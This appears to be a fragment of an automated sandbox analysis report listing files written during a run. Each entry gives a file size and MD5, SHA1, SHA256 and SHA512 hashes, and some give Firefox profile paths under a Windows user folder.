SHA256628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA51258fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7
-
Filesize
622KB
MD584f05dddefb1c72567827be553fe67fe
SHA1c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA51299954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD5f25ddb78a2cc3b6442c52a3c4a2aa843
SHA152ba6df84b158bf917044fee22625d2a12202382
SHA256ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
SHA51274c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14
-
Filesize
1KB
MD5d1fdfad5ce7134b1ef5a54cf37001031
SHA182e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA25654f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7
-
Filesize
819B
MD5f2a75175c8082ccd3e1713b00556a6e2
SHA12f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9
-
Filesize
6KB
MD5da7552eed00789bd53f831e67cf54f8d
SHA1653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA2565cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc
-
Filesize
399B
MD5744f8978db36b4b9db7cb6e5c8c41e08
SHA184321921f622d20a4d40c9bef43b7744e74aaee7
SHA256cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f
-
Filesize
164KB
MD51fed66d1f6b85bda20fe0403ca01c9bd
SHA16a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA5120fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
164KB
MD577334f046a50530cdc6e585e59165264
SHA1657a584eafe86df36e719526d445b570e135d217
SHA256eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA51297936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90
-
Filesize
6.1MB
MD5f6d520ae125f03056c4646c508218d16
SHA1f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin
Filesize18KB
MD550d9cbfc86063598d36e2f17308107f9
SHA1b60775ecc55ea344f7cbfc474c9b29370fc576f3
SHA2564db84cc62edeabe399e8697ef4522889556a101b4f7998fd8f0ac0b4afbaba6c
SHA5120441e40eafd84fec57115852071198db7950b35013e990cb053a485569215777e976c81eb3e3c9561645dab581aef38e9da317ac0e27f5bb41b01b59101d7012
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin
Filesize7KB
MD550acef891911afd2587ab66c4baf8494
SHA16c2aef5a2c357aef052bf2646606b85e434258cc
SHA256ca9257cd292091cc9efa0e4a25aeffed9541b54e8cb153f48440093caf8f1427
SHA512be594d0ecd02306f67abf64cc77a4495876145ff2b9851ab7aa109f8414a7d83927fa0a87198f8f4d374e5c4c0607f1537afb7a38a449fd06f94ce21f784ef4f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5507850023a4693c91c2e02d1a5300a43
SHA12b65034d79ee54842ae7b996224ec00077e0ddc3
SHA2565099d110ba10ba1e5e336ba890ae862c4b92b30e0f640af8bfaf56b47c1b6bca
SHA5129518fcca07c0f6e771d7be82b5c2ccd925061d147dfeca85a1801eef475106ffff35b3431eb26df95fb1ab5d163811852917685fe6e105c441656fabd1447b3e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize36KB
MD5cdad3fe34c53a9e65f1069d2a1d057f9
SHA1a7d9e2dec4950ad942af49cb7cda4f6bbeb84cdd
SHA256330e7996e52ff1968f014fcef0fd6c8a4f5f7cee6d1bcee57d27edd3284582fc
SHA512ce4ca4e495e5a675ffeaabb3fafb493367496fd25b597bf07d08583f1bd9586e72f5db0479bd43015a92614fe3ed78dc2adf7433061b93e652efc93cc5f77408
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD58cfb8ce1a4be9b80dffd957c6246d450
SHA19b49ad5ae3606664e7f078b785c0f49dfb1ba6ab
SHA256a17ebe51f44f2badd79038b8dbcec2e8048253de32b194ecfa5f7e76ad0fde9e
SHA512f65735adf483e21b40b124dbe4cc528b6df54658834ab873be4148f5f36491af5beb8dac7e3c2a02f568127f4401f87b560a030bcf51af5596676c490a032cfd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\42ec8a01-e3b2-4c0b-961c-0694afd3056a
Filesize659B
MD5212c0036733e86fcbb127820f7353de2
SHA1fc8716214f84648632b7d5510566d7916f6b3d6e
SHA2564d9fbc6840bc383c5942ea1326880930eed92c27b2557ff813404f4ba85573be
SHA51205550238af2badab78df21d668cbf8f2f3af17efefca885b4a4647944c183308dad59883f45af0c57c193c62d67dd59f3ec3029d474f041aef213a15dcab4505
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\bb10be38-70f8-4728-ab9b-b68bf2b93fee
Filesize982B
MD5b1a92cf9d121eede5ee57fd107afe61a
SHA10303eb15a5c4adc3538f23773fdc66c3ec3810d3
SHA256accd80c976e27730102c220d479e219adab1c0868a89a33ce7598b47735e8306
SHA5126042ab754e9a31f52f63b07427a10a45e3c2510aafa0b3f50e5060d486eadf60d5677e0b64ea65cfcddcf3cf39a18f6bc205fabd5067cdc2ef116a5c9d06727a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5fc06e482610963b3dfc433d009ee864a
SHA117c7cb8d1ac199f9ee7f496a20059c38a9b686c9
SHA25624f8e9c836f85316a5be50905f34eba3ff16826ba5ec710d5d80d1ab2d895585
SHA51217c02a2176b93f80e59417f1b1043c1e7393e7e7894be0159e7b1db339153695925e3674994b98afcb67de5d2db8d61bc0b9d1f4e55a3b61e7ca251c395f5bd6
-
Filesize
11KB
MD5fa8e66edf858fed3afd8f1c33bf664b3
SHA134ac9ed76881652050f25f2654fe10a1dcc37bce
SHA25667d0ed4ed2c4a57e9407820ca78927e25a13ec1fe3d493da29bd55d5a0f27f07
SHA512904feb1739771df25a6ef70636d4b0b5cdb17daff4a2a2f78645fd507229633cd2bafad8a6827207bcf90d7656836fbdce6c60ad4aa0b2c8ea3214308900377f
-
Filesize
15KB
MD5dc54a77b3d68c4b74a535bb81a5b1559
SHA126b8318849c943c467423d4187e1ba0e1d27231c
SHA256f30296c6ae7013f2b2be48332ab9f4097101063d2cce49900e42a014d5bfbaee
SHA512f699d0e6beb7214f11ee7a1c473a606f476ba53350fc8f9c8895ce56bf89e400e9192623e493b892ca0d2d434556e4089228c907612a97280c8ca63569534ce3
-
Filesize
10KB
MD5c24cfa12c04c2a51386b08b08d3d25e8
SHA18ae7b50b15df68892e321b7b599e2bf11a7d65c4
SHA2562c44f524ebe8e2b8b3586f57bd9f23f4264528d6758f38b7488199079a66e692
SHA512fc06923ffd09b0120563ab4369f7e5794d77b329a761c7434e62a147d85308ec88e2b818240251e82e9f8d9eab17243121ffee1ad25e1f676ba5c0f515fb2176
-
Filesize
10KB
MD5bbce068d5657afc4c5f5a283e89b7a0b
SHA1c8b8ccc5cd4316066dbe7f2de5414f2ddb28364d
SHA256bbb839c1146de172a1fa06a60c24ffb2f82f66c9cc9a8d68cf9313b68e5d8954
SHA51224fbd68b79a8b22ce22e32572c1892ee0f2b47ea43e0814d35a4b6d853ec203db9c00cae5010b87478fcb2ce6a257c425ed526dd7ec89b103e7d39cef394247f